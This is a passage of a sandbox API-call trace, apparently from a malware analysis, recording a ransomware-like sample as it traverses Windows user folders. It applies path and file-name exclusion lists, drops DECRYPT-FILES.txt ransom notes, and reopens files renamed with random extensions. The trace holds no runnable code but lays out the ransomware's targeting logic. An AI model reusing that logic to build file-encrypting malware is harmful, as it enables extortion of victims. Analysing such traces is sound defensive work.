(lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="AhnLab") returned 0x0 [0186.415] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.415] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned 69 [0186.415] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.415] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\0a16c9.tmp") returned 80 [0186.415] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\low\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.416] GetLastError () returned 0x5 [0186.416] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned 69 [0186.416] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.416] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\DECRYPT-FILES.txt") returned 87 [0186.416] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\iecompatcache\\low\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.416] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\") returned 69 [0186.416] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*" [0186.416] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IECompatCache\\Low\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0186.416] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.416] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.416] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.416] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.416] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0b4bf00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.416] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.416] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0b4bf00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.416] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0186.416] CloseHandle (hObject=0xffffffff) returned 0 [0186.416] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0b4bf00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b4bf00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low\\", cAlternateFileName="")) returned 0 [0186.416] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0186.416] CloseHandle (hObject=0xffffffff) returned 0 [0186.417] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x642afa0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe9256a4, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IETldCache", cAlternateFileName="IETLDC~1")) returned 1 [0186.417] lstrcmpW (lpString1="IETldCache", lpString2=".") returned 1 [0186.417] lstrcmpW (lpString1="IETldCache", lpString2="..") returned 1 [0186.417] lstrcatW (in: lpString1="IETldCache", lpString2="\\" | out: lpString1="IETldCache\\") returned="IETldCache\\" [0186.417] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="IETldCache\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\" [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\Program Files") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch=":\\Windows") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\Games\\") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\All Users") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\", lpSrch="\\IETldCache\\") returned="\\IETldCache\\" [0186.417] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0186.417] lstrcmpW (lpString1="Libraries", lpString2=".") returned 1 [0186.417] lstrcmpW (lpString1="Libraries", lpString2="..") returned 1 [0186.417] lstrcatW (in: lpString1="Libraries", lpString2="\\" | out: lpString1="Libraries\\") returned="Libraries\\" [0186.417] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Libraries\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\Program Files") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch=":\\Windows") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\Games\\") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\All Users") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="AhnLab") returned 0x0 [0186.417] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.417] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 61 [0186.418] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.418] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\0a16c9.tmp") returned 72 [0186.418] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.424] GetLastError () returned 0x5 [0186.424] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 61 [0186.424] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.424] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\DECRYPT-FILES.txt") returned 79 [0186.424] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.426] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 61 [0186.426] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*" [0186.426] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0186.426] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.426] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.426] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.426] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.426] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0b72060, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0b72060, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0b72060, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.427] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.427] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89275ec, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x112, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.427] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.427] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.427] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.427] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.427] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0b72060, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.library-ms.Tl4X", cAlternateFileName="DOCUME~1.TL4")) returned 1 [0186.427] lstrcmpiW (lpString1="Documents.library-ms.Tl4X", lpString2="DECRYPT-FILES.txt") returned 1 [0186.427] lstrcmpiW (lpString1="Documents.library-ms.Tl4X", lpString2="autorun.inf") returned 1 [0186.427] lstrcmpiW (lpString1="Documents.library-ms.Tl4X", lpString2="boot.ini") returned 1 [0186.427] lstrcmpiW (lpString1="Documents.library-ms.Tl4X", lpString2="desktop.ini") returned 1 [0186.427] lstrcmpiW (lpString1="Documents.library-ms.Tl4X", lpString2="ntuser.dat") returned -1 [0186.427] lstrcmpiW (lpString1="Documents.library-ms.Tl4X", lpString2="iconcache.db") returned -1 [0186.427] lstrcmpiW (lpString1="Documents.library-ms.Tl4X", lpString2="bootsect.bak") returned 1 [0186.427] lstrcmpiW (lpString1="Documents.library-ms.Tl4X", lpString2="ntuser.dat.log") returned -1 [0186.427] lstrcmpiW (lpString1="Documents.library-ms.Tl4X", lpString2="thumbs.db") returned -1 [0186.427] lstrcmpiW (lpString1="Documents.library-ms.Tl4X", lpString2="Bootfont.bin") returned 1 [0186.427] lstrlenW (lpString="Documents.library-ms.Tl4X") returned 25 [0186.427] lstrcmpiW (lpString1="Tl4X", lpString2="lnk") returned 1 [0186.427] lstrcmpiW (lpString1="Tl4X", lpString2="exe") returned 1 [0186.427] lstrcmpiW (lpString1="Tl4X", lpString2="sys") returned 1 [0186.427] lstrcmpiW (lpString1="Tl4X", lpString2="dll") returned 1 [0186.427] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 61 [0186.427] lstrlenW (lpString="Documents.library-ms.Tl4X") returned 25 [0186.427] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0186.427] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Documents.library-ms.Tl4X" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms.Tl4X") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms.Tl4X" [0186.427] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.427] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Documents.library-ms.Tl4X" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\documents.library-ms.tl4x"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.428] CloseHandle (hObject=0x0) returned 0 [0186.428] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.428] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0b981c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xee1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music.library-ms.KCA0", cAlternateFileName="MUSICL~1.KCA")) returned 1 [0186.428] lstrcmpiW (lpString1="Music.library-ms.KCA0", lpString2="DECRYPT-FILES.txt") returned 1 [0186.428] lstrcmpiW (lpString1="Music.library-ms.KCA0", lpString2="autorun.inf") returned 1 [0186.428] lstrcmpiW (lpString1="Music.library-ms.KCA0", lpString2="boot.ini") returned 1 [0186.428] lstrcmpiW (lpString1="Music.library-ms.KCA0", lpString2="desktop.ini") returned 1 [0186.428] lstrcmpiW (lpString1="Music.library-ms.KCA0", lpString2="ntuser.dat") returned -1 [0186.428] lstrcmpiW (lpString1="Music.library-ms.KCA0", lpString2="iconcache.db") returned 1 [0186.428] lstrcmpiW (lpString1="Music.library-ms.KCA0", lpString2="bootsect.bak") returned 1 [0186.428] lstrcmpiW (lpString1="Music.library-ms.KCA0", lpString2="ntuser.dat.log") returned -1 [0186.428] lstrcmpiW (lpString1="Music.library-ms.KCA0", lpString2="thumbs.db") returned -1 [0186.428] lstrcmpiW (lpString1="Music.library-ms.KCA0", lpString2="Bootfont.bin") returned 1 [0186.428] lstrlenW (lpString="Music.library-ms.KCA0") returned 21 [0186.428] lstrcmpiW (lpString1="KCA0", lpString2="lnk") returned -1 [0186.428] lstrcmpiW (lpString1="KCA0", lpString2="exe") returned 1 [0186.428] lstrcmpiW (lpString1="KCA0", lpString2="sys") returned -1 [0186.428] lstrcmpiW (lpString1="KCA0", lpString2="dll") returned 1 [0186.428] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 61 [0186.428] lstrlenW (lpString="Music.library-ms.KCA0") returned 21 [0186.428] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0186.428] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Music.library-ms.KCA0" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms.KCA0") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms.KCA0" [0186.428] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.429] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms.KCA0" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms.kca0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.429] CloseHandle (hObject=0x0) returned 0 [0186.429] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.429] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0b981c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf03, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures.library-ms.KCA0", cAlternateFileName="PICTUR~1.KCA")) returned 1 [0186.429] lstrcmpiW (lpString1="Pictures.library-ms.KCA0", lpString2="DECRYPT-FILES.txt") returned 1 [0186.429] lstrcmpiW (lpString1="Pictures.library-ms.KCA0", lpString2="autorun.inf") returned 1 [0186.429] lstrcmpiW (lpString1="Pictures.library-ms.KCA0", lpString2="boot.ini") returned 1 [0186.429] lstrcmpiW (lpString1="Pictures.library-ms.KCA0", lpString2="desktop.ini") returned 1 [0186.429] lstrcmpiW (lpString1="Pictures.library-ms.KCA0", lpString2="ntuser.dat") returned 1 [0186.429] lstrcmpiW (lpString1="Pictures.library-ms.KCA0", lpString2="iconcache.db") returned 1 [0186.429] lstrcmpiW (lpString1="Pictures.library-ms.KCA0", lpString2="bootsect.bak") returned 1 [0186.429] lstrcmpiW (lpString1="Pictures.library-ms.KCA0", lpString2="ntuser.dat.log") returned 1 [0186.429] lstrcmpiW (lpString1="Pictures.library-ms.KCA0", lpString2="thumbs.db") returned -1 [0186.429] lstrcmpiW (lpString1="Pictures.library-ms.KCA0", lpString2="Bootfont.bin") returned 1 [0186.429] lstrlenW (lpString="Pictures.library-ms.KCA0") returned 24 [0186.429] lstrcmpiW (lpString1="KCA0", lpString2="lnk") returned -1 [0186.430] lstrcmpiW (lpString1="KCA0", lpString2="exe") returned 1 [0186.430] lstrcmpiW (lpString1="KCA0", lpString2="sys") returned -1 [0186.430] lstrcmpiW (lpString1="KCA0", lpString2="dll") returned 1 [0186.430] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 61 [0186.430] lstrlenW (lpString="Pictures.library-ms.KCA0") returned 24 [0186.430] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0186.430] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Pictures.library-ms.KCA0" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms.KCA0") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms.KCA0" [0186.430] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.430] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms.KCA0" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms.kca0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.430] CloseHandle (hObject=0x0) returned 0 [0186.430] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.430] 